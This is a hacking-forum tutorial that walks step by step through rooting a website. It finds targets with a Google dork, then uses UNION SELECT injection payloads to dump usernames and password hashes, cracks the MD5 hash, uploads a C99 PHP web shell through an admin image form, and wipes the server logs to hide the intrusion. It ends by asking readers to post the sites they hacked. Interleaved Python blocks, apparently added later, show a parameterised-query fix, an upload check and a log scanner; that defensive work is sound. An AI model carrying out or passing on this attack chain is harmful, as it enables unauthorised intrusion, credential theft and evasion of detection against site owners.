Advanced SQL Injection Part 1: Complete website rooting tutorial

Hi All,

In this tutorial we will be rooting a vulnerable web server using the Mantra browser. It's a long post that I've made, so have patience to learn it, considering the patience it took me to make it for you all. :D

What all you need
'''''''''''''''''''''''''''''''''''
1. PATIENCE, PATIENCE & PATIENCE :P

2. Mantra Browser (best browser for hackers)

3. An Admin Finder tool

4. Any PHP shell you are comfortable with (my personal choice: C99)

Download from here: http://www.sh3ll.org/

5. Google dork to find SQLi-vulnerable sites:

allinurl:.php?id=

Now the process
'''''''''''''''''''''''''''''''

Step 1:

I'm on the home page of the website now


Step 2:

I went through all the pages of the website and found a page that takes its input through a URL parameter.


Step 3:

I launched Hackbar by pressing F9



Step 4:

The power of the single quote. I check whether the website is vulnerable by appending a ' to the end of the URL and pressing Execute.


Since the page content is now different from the previous one, I can be sure that the web page is vulnerable.


Step 5:

Let's find out the number of tables.


Step 6:

I have to keep increasing the last number until I see a change in the page. Done by hand this is a tedious task, since there can be hundreds or thousands of tables, if not more, but with this tool I can simply press the + button until I see a change on the web page.


Step 7:

I went up to 7 and there was no change so far.


Step 8:

I'm on 8 now and I can see the page has changed.


Step 9:

Now let's go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT.




Step 10:

I provided the number of tables. Since I got a different page at 8, I can be sure that table 8 does not exist and there are only 7 tables.




Step 11:

Wonderful. I can see some numbers on the page now; those are the vulnerable columns, the ones whose values get displayed. Let's take number 2.


Code:
http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7





Step 12:

I replaced number 2 in the URL with another SQL expression; it got executed and the result is displayed on the page.


Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7


The current user is cms_user@localhost



Step 13:

Let's find out the version of the database. I replaced 2 in the URL with the version() function.


Code:
http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7


5.0.45 is the version



Step 14:

Let me list all the tables


Code:
http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables


From this list I found "user" is an interesting table



Step 15:

Now I listed all the columns, and it's a big list.


Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns




Step 16:

I want columns from the table "user" and nothing else


Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'




Step 17:

Let's find the user name.


Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user




Step 18:

Now, what about the password?


Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user


It's encrypted.
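Steps 4 to 18 work because the id parameter is pasted straight into the SQL text. The example below is added here and is not code from the tutorial: it rebuilds that behaviour against an in-memory SQLite database (a constructed stand-in for the CMS, with the table and column names taken from the steps above) and places the parameterised version beside it, so the single-quote error, the ORDER BY limit and the UNION read-out can be seen succeeding against the first function and failing against the second.

```python
import sqlite3

def build_db():
    """Constructed stand-in for the tutorial's CMS database (not the real site)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE events(id INTEGER, title TEXT, c3 TEXT, c4 TEXT, c5 TEXT, c6 TEXT, c7 TEXT);
        INSERT INTO events VALUES (13, 'Town fair', '', '', '', '', '');
        CREATE TABLE user(user_username TEXT, user_password TEXT);
        INSERT INTO user VALUES ('admin', 'md5-hash-placeholder');
    """)
    return db

def fetch_event_vulnerable(db, id_param):
    # The request parameter is concatenated into the statement, so anything after
    # the number is parsed as SQL. This is the behaviour steps 4-18 rely on.
    return db.execute("SELECT * FROM events WHERE id = " + id_param).fetchall()

def fetch_event_fixed(db, id_param):
    # Validate the type the page expects, then bind the value as a parameter so
    # the database engine never treats it as part of the statement.
    try:
        event_id = int(id_param)
    except ValueError:
        return []  # reject instead of echoing a database error back to the client
    return db.execute("SELECT * FROM events WHERE id = ?", (event_id,)).fetchall()

def probe(db, fetch, id_param):
    """Return ('rows', rows) or ('error', msg); that difference is the 'page changed' signal."""
    try:
        return ("rows", fetch(db, id_param))
    except sqlite3.Error as exc:
        return ("error", str(exc))

if __name__ == "__main__":
    db = build_db()
    for payload in ("13", "13'", "13 ORDER BY 7", "13 ORDER BY 8",
                    "13 UNION SELECT 1,user_username,3,4,5,6,7 FROM user"):
        print("vulnerable:", repr(payload), "->", probe(db, fetch_event_vulnerable, payload)[0])
        print("fixed:     ", repr(payload), "->", probe(db, fetch_event_fixed, payload))
```

The ORDER BY errors show why the "+" button in step 6 stops at 8: the database rejects an ORDER BY position beyond the number of selected columns, and the error page is what the tutorial reads as "the page changed".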



Step 19:

Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com




Step 20:

Voila.!!! I got the password




Step 21:

Finding the login page. It was right in front of me.


NB: You can find it with the Admin Finder toolkit I mentioned above. Just copy-paste the URL into Web Admin Finder v2.0 and start searching.


Step 22:

Logging in with the credentials I have




Step 23:

Greetings.!!!




Step 24:

I'm an admin now. Look at my powers.




Step 25:

Let me add an event




Step 26:

and of course I want to upload a picture




Step 27:

Let's see whether it allows me to upload the shell or not.




Step 28:

Now I'm pressing on "Add Event" button




Step 29:

Nice. Looks like it got uploaded.




Step 30:

Let's see where the shell got uploaded to




Step 31:

I'm trying to get the default upload location





Step 32:

Looks like I got it


Let me click on the c9shell.php file I just uploaded
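Steps 26 to 32 get a PHP shell onto the server through the event picture upload and then find it at the default upload path. The check below is added here to show what the upload handler should have done; it is not the CMS's code, and the allowed image types, the random stored name and the serving directory are my assumptions.

```python
import os
import re
import secrets

# Assumption: the event form only needs JPEG, PNG and GIF pictures. Each
# extension maps to the byte signature(s) a genuine file of that type starts with.
IMAGE_SIGNATURES = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
SAFE_STEM = re.compile(r"^[a-z0-9_-]{1,64}$")

def check_picture_upload(filename, content):
    """Return (ok, reason). ok is True only for a single-extension image whose bytes match its type."""
    base = os.path.basename(filename.replace("\\", "/"))  # drop any client-supplied path
    stem, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in IMAGE_SIGNATURES:
        return False, "extension not allowed: %r" % ext  # a .php upload stops here
    if "." in stem or not SAFE_STEM.match(stem.lower()):
        return False, "double extension or unsafe characters in name"
    if not content.startswith(IMAGE_SIGNATURES[ext]):
        return False, "content does not match %s signature" % ext
    if b"<?php" in content or b"<?=" in content:
        return False, "PHP tag embedded in image data"
    return True, "ok"

def stored_name(filename, content):
    """Server-chosen random name, so the uploader cannot predict the URL as step 31 did; None if rejected."""
    ok, _reason = check_picture_upload(filename, content)
    if not ok:
        return None
    # Save under this name in a directory the web server serves as static files only.
    return secrets.token_hex(16) + os.path.splitext(filename)[1].lower()
```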



Step 33:

Voila. I have shell access




Step 34:

I simply clicked on the up button to get the root folder


Now I can do whatever I wish: deface the website, maintain access or whatever. But that's out of the scope of the current tutorial.



Step 35:

What I'm interested in is the log folder.





Step 36:

I clicked on the log.log file and it has the logs of my noisy SQL injection attacks
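Step 36 shows that every request from steps 4 to 18 left a line in the server log. The scanner below is an added example, not from the tutorial: it reads constructed Apache-style access-log lines modelled on those requests (the client address, timestamps and sizes are made up) and flags the sequence a defender would look for, ending with the PHP file fetched from the upload directory.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines modelled on the tutorial's requests; the last line
# is a benign request from another client.
SAMPLE_LOG = """\
192.168.132.1 - - [10/Oct/2023:21:00:01 +0000] "GET /?id=13 HTTP/1.1" 200 5120
192.168.132.1 - - [10/Oct/2023:21:00:09 +0000] "GET /?id=13%27 HTTP/1.1" 200 1320
192.168.132.1 - - [10/Oct/2023:21:00:31 +0000] "GET /?id=13%20ORDER%20BY%208 HTTP/1.1" 200 1320
192.168.132.1 - - [10/Oct/2023:21:01:02 +0000] "GET /?id=13%20UNION%20SELECT%201,user(),3,4,5,6,7 HTTP/1.1" 200 5130
192.168.132.1 - - [10/Oct/2023:21:01:40 +0000] "GET /?id=13%20UNION%20SELECT%201,table_name,3,4,5,6,7%20from%20information_schema.tables HTTP/1.1" 200 9011
192.168.132.1 - - [10/Oct/2023:21:03:15 +0000] "GET /uploads/c99shell.php HTTP/1.1" 200 40211
10.0.0.5 - - [10/Oct/2023:21:03:20 +0000] "GET /?id=14 HTTP/1.1" 200 5118
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"')
# (label, pattern) applied to the URL-decoded, lower-cased request target.
RULES = [
    ("quote-probe", re.compile(r"=\d+'")),                         # step 4
    ("order-by-enum", re.compile(r"\border\s+by\s+\d+")),          # steps 5-8
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b")),  # steps 9-18
    ("schema-enumeration", re.compile(r"information_schema\.")),   # steps 14-16
    ("php-in-uploads", re.compile(r"/uploads?/[^?]*\.php")),       # steps 26-33
]

def parse_line(line):
    m = REQUEST_RE.match(line)
    return None if not m else (m.group(1), m.group(2), m.group(3), unquote_plus(m.group(4)))

def scan_log(text):
    """Return (client_ip, label, decoded_target) for every rule hit, in log order."""
    hits = []
    for parsed in filter(None, map(parse_line, text.splitlines())):
        ip, _ts, _method, target = parsed
        hits += [(ip, label, target) for label, rx in RULES if rx.search(target.lower())]
    return hits

def suspicious_clients(text, threshold=2):
    """Clients with at least `threshold` distinct labels: one hit may be noise, a sequence is the workflow."""
    labels_by_ip = {}
    for ip, label, _target in scan_log(text):
        labels_by_ip.setdefault(ip, set()).add(label)
    return sorted(ip for ip, labels in labels_by_ip.items() if len(labels) >= threshold)
```

Because steps 37 to 39 wipe the log on the server itself, a scanner like this only helps when the lines have already been shipped to a separate host.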




Step 37:

Let me go back and edit the log file





Step 38:

I deleted all the log entries. Now saving it.




Step 39:

Nice. Log file is empty now



Step 40:

Now, let's remove the C99 shell by pressing Self Remove.




Step 41:

Confirmed.!!!




Step 42:

OK. Good Bye C99



Step 43:

Well, it deleted itself.


  
So that's it for tonight. I hope all of you will be successful with this tutorial. Please submit the sites you hacked with Advanced SQL Injection under this post.

Happy Hacking.!!!